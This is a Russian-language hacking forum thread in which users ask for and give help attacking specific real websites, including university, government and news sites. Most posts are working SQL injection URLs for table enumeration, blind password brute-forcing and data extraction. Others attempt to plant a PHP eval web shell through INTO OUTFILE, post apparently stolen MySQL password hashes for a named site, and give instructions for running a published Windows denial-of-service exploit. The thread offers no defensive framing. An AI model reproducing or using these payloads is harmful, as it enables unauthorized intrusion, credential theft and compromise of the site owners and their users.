|
Ваши вопросы по уязвимостям.
В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму). Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать. Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется |
Расскажите про вот такую штуку.
http://webapps.jhu.edu/needs/detail.cfm?id=1805'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES) Я вначале подумал что это MSSQL (потому и писал в запросе INFORMATION_SCHEMA.TABLES), а потом посмотрел вроде и не мс, а макромедиа. Короче не понятно мне. Плюс к тому странный выдает ответ - не найду такого-то файла, отсюда вывод что можно грузить файлы баз данных если знаешь имя файла. Но там дописывается расширение автоматом, в связи с этим пробовал %00 - не получилось. Вообщем не все мне ясно с этой базой. Может кто видел такое - поделитесь. |
Это ColdFusion
права у твоей небольшие - нет прав на системные таблицы. это видим из http://webapps.jhu.edu/needs/detail.cfm?id=1805+union+select+1,2,3,4,5,6,name,8 ,9,10,11,12,13+from+MSysObjects подбирай кол-во столбцов http://webapps.jhu.edu/needs/detail.cfm?id=1805+and+1=0+union+select+1,2 ... Загвоздка в том что запрос не выполнится пока одновременно не будет подобрано точное кол-во + подставлено в одно из полей правильное название одного из столцов (иначе база считает запрос пустым) либо же при наличие прав у юзера (а они часто оставляются по дефолту) выполнять любые запросы в кф базе http://webapps.jhu.edu/needs/detail.cfm?id=1805;запрос |
brute/shell
приветствую!
столкнулся с такой проблемой ( http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20m ysql.user%20where%20user=char(114,111,111,116)),1, 1))>=100,1,0)/* Error Number: 1242 Error Message: Subquery returns more than 1 row а в случае 1=if(ascii(substring((select user()),1,1))>=100,1,0) все работает нормально, возвращается ответ либо 1 либо 0..... то есть можно перебрать ) права есть! пасс выглядит так.... 3553f4a3048036eb я просто не в курю почему перебирать не дает... ------------------------------------------------------------------ и вторая проблема..... не могу залить шелл, хотя файл привелегии есть..... лоад_файл работает..... http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/* You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',3,4,5,6,7,8 into outfile 1.txt/*' at line 2 если <?php eval($_GET[http://server.com/cmd.php]) ?> расписать все через char то начинает ругаться на 1.txt.... Error Number: 1064 Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt/* AND n.status != 'Disabled' ORDER BY date DESC ' at line 2 уже и так писал и сяк, не получается с этим серваком ((( версия 5.0.22 с уважением, |
Цитата:
юзай лимит хотя странно, почему при where выдается не одна строка... попробуй тупо лимит 0,1 , как правило, рут - первый юзер. по поводу второго: <?php eval($_GET[http://server.com/cmd.php]) ?> это должно быть в кавычках |
Цитата:
Т.е. вы посто забыли поставить кавычки за прописать полный путь. |
спасибо за советы,
1. не смог проверить сервак в дауне 8*(**** я понял в чем суть ошибки, просто меня самого смутило что возвращается какой то не однозначный ответ и не 1 и не 0 - поэтому и спрашиваю что за муть.... 2. кавычки фильтруются жестко, по формату знаю.... писал через чар, но не выходит.... ругается ошибкой 1062 кажется..... писал что синтаксическая ' без пути - без ничего..... www.server.com/index.php?id=1 union select 1,char(),3,4,5,6,7,8 into outfile или же from table into outfile полный путь или же просто для теста тупо 1.txt/* пробовал по всякому, может реально не судьба) поэтому и оставался вариант брута, хз подскажите как правильно запрос написать с лимитом.... where user= ? благодарю.... |
Цитата:
|
Цитата:
Вот это ты имел ввиду? Цитата:
|
там как не странно но два пользователя с 2-мя одинаковыми пассами....
limit помог, пасс соответственно как я и писал выше.... root:3553f4a3048036eb touchandgo:3553f4a3048036eb http://www.touchandgorecords.com/bands/band.php?id=70%20union%20select%201,concat(USER(), char(58),VERSION(),char(58),DATABASE()),3,4,5,6,7, 8/-- ------ именно ' там фильтруются, у меня не получилось шелл залить( благодарю за помощь, отдельное спасибо I-I()/Ib - за статью..... ) |
Работа с MySQL версии 5.0.27.
Делаю такой запрос Цитата:
Нахожу нужную таблицу через лимит. Составляю запрос Цитата:
Выводиться имя столбика - "id" Дальше пытаюсь вытянуть данные таким запросом Цитата:
Пробую Цитата:
В итоге могу узнать полностью структуру базы но данные не могу вывести. Что не так? Может есть хитрости при работе с MySQL версии 5.0.27. Как правильно строить запрос ведь скуль есть, а результата нет? |
Значит твоему пользователю закрыт доступ, такое тногда бывает, через системные таблицы видишь, а вывести не можешь((((
|
Возможно эта таблица находится в другой базе, можно посмотреть запросом
Цитата:
и если не ошибаюсь можно выдернуть интересную связку Цитата:
|
Попробуй
Код:
-4+union+select+1111,table _schema,3333,4444,5555,6666 ,7777,8888+from+information_schema.tables+where+table_name='wifi_points'/*.html |
Здравствуйте, мне нужна ваша помощь.
На уязвимой странице происходит передача параметра без фильтрации, он есть особенность- значения полей не выводятся на странице, а на основе данных рисуется карта (это не важно, т.к в базе нет паролей). Я пытаюсь сделать вывод в файл с помощью INTO OUTFILE , но получаю ошибку. Я отправляю ?id=1122+UNION+SELECT+1,2+FROM+locations+INTO+OUTF ILE+'name' (OUTFILE я пишу одним словом, без пробела Ж) Выдает такое Код:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'INTO'. (severity 15) in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7?id=1122+UNION+SELECT+1,2+FROM+locations всё нормально, без ошибок PHP скрипт там такой PHP код:
Всё вроде бы очень просто, но я не пойму что это за неправильный синтаксис возле INTO... Помогите разобраться |
ээм, а может быть в MSSQL немнога другие запросы поэтому и в into возникает неправильный синтаксис... Все же я не уверен, это всего лишь предположение, за неправильность не бить =)
|
http://e-catalog.rusbiz.ru/1'+and+'1'='1.html
В чем косяк? Запрос вроде правильный, но не проходит. Подозреваю, глюк с плюсами... пробовал /**/, не канает :) |
Не знаю правильно ли я выбрал раздел.
Народ вот есть эксплоит MS Windows Explorer.exe Gif Image Denial of Service Exploit http://www.milw0rm.com/exploits/4215 Его вроде компилировать на перле. Но не понел как его использовать. Помоги как его использовать. |
вот попробовал вбить такое http://www.olympic.org/uk/news/olympic_news/full_story_uk.asp?id=2272' и выдает как видно ошибку ....
Microsoft VBScript runtime error '800a000d' Type mismatch: 'cint' /common/asp/inc_news.asp, line 634 хотя сами могли увидеть.... так вот... что мона сделать дальше?? )) или еще конкретней как заюзать все это... что применить?? ) заранее благодарю... ) |
Цитата:
Установи Active Perl (use g00gle 4 searching) Далее... 1. если сплоит с ГУИ (с графич. интерфейс), просто кликни по нему пару раз 2. если сплоит консольный, запускаешь cmd.exe, переходишь в каталог со сплоитом и запускаешь его, предварительно прочитав в хелпе, за что какой аргумент отвечает. пс: данная тема не раз обсуждалась, если все еще непонятно - юзай поиск. |
Вобще этот сплоит создает картинку Art.gif которая при ее загрузке вызывает DOS но этот сплоит немного исправить надо (под винду)
а в целом действуй так, как посоветовал n1†R0x, только вот по идее когда ты сам картинку будешь смотреть у тебя винда уйдет в аут... вопрос: зачем он тебе нужен? :) |
нашел количество полей - пытаюсь вывести бд ругается.......
http://www.suvd.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* |
x.Elf делай через подзапросы
|
там 3 версия мускула, а внем union select не работает...
Код:
http://www.suvd.ru/news.php?id=4825%20and%20ascii(lower(substring(Version(),1,1)))=51/* |
тут сайтец с скуль уязвимостью...
http://www.mediacomp.ru/?action=sub_kat&top_kat=-1,union+select+1/* самое ссмешное то что я подобрал до 72 и нифига ничего не вылезло.... что предложите сделать ....? |
Цитата:
|
то есть ты хочешь сказать что истина полюбе есть, тока находится далеко и мою работу облегчит данная фича?? или как??
|
Цитата:
http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version (),0x71),0x71)/* |
Цитата:
сначало прочти, а потом и вопросы... не тупи... |
заюзай AND
|
вторая ссылка не пашет , до первой странно, почему я ее пропустил ппц. я даже удивился ))) но повторюсь вторая ссылка полюбе версию не показывает...
|
Цитата:
|
Цитата:
|
Цитата:
|
понятно ,
P.s. тока не груби |
Цитата:
как было сказано выше - это просто уже выносит на грубость... |
ясно что предложишь??
|
http://www.usgs.gov/newsroom/article.asp?ID=1'
Помогите провести инъект на сайте. У меня с MSSQL пока туговато... http://ts.edu.ru/schools/region/4/?town=%C4' и здесь... uralsmart.ru Опять таки mssql. Я вижу что скл ругается ......еще вижу строки логин пасс и ввожу запрос типа: ' or 'a'='a " or 1=1-- or 1=1-- а тока ругается -ХЕЛП |
Код:
http://ts.edu.ru/schools/region/4/?town=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- |
Цитата:
|
| Время: 04:20 |